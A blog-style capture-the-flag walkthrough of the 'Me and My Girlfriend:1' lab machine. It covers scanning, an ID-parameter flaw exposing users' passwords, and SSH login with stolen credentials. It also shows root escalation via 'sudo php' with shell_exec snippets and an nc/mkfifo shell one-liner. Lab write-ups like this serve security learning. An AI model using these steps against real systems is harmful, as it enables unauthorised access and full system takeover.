Me and My Girlfriend:1 Walkthrough

Spyx · March 1, 2020

As usual I start to scan network. I used masscan as it is faster compare to nmap. I scanned for port 80 as this is common port for CTF machines.

masscan -p80

I noticed that only 2 target as available. As one of that is my default gateway i decide to can In your case… 99% IP address will be different.

I decide to to full scan against this machine. I used nmap

nmap -A -sV -T4 -p-

I used these options as -A will give you os detection and script scanning. Always use -sV to get version detection. I know that -A -sV are same so don’t judge :) Option -T4 is more aggressive scanning that normal. and -p- is shortcut to scan all ports.

As you can see from output only port 80 and 22 are open. I decide to explore port 80. I lunched web browser and get some ‘felling’ how web sites is looking.

As you can see there is some login/register options and some static pages. After register i was able to log in and was redirect to home page as register user. Except change profile there was nothing interesting.

As you can see from url there is ID=14. I decide to change to 1 and BINGO. I was able to see profiles of other users. You could decide to check every user and grab his/her username and password. Them you can run hydra against port 22. But as from description of this machine Alice was person who was hiding something. I found Alice profile and decide to use her credentials to login into machine…

I was in. With little poking around Alice has hidden folder with all her secrets and also first flag.

After start looking for privilege escalation as start searching for some sticky bits or some clues. Them after reading few linux simple privilege escalation tricks. I tried this command

sudo -l

This command will show commands which you can run as sudo with out root password. I command was there… php. Created some simple shell.php file below.

$output = shell_exec('ls /root');
echo "$output";

Run it as

sudo php -f shell.php

and get list files from root directory. There was on only one file… flag2.txt. Decide to change my php file a little bit to get output of this file

$output = shell_exec('cat /root/flag2.txt');
echo "$output";

and hurray got second flag…

That’s it all, right? Well i was happy i pwned this machine but them i asked my self. Can I used this privilege escalation misconfiguration to get proper root shell? Challenge accepted. I know you can use nc and -e to bind bash to you but version nc on that machine was did not have -e. After asking my search engine for help. I was able to find article where this exact nc version can be use to get access to shell. I changed my shell to this one.

$a = shell_exec('mkfifo f');
$a = shell_exec('nc localhost 4444 0<f | /bin/sh -i 2>&1 | tee -f');

Run ‘screen’ command to have to virtual sessions. Lunch nc to listen on port 4444. Move to second session and run my php file. BAAAM i have root shell :)

I hope you like this walkthrough

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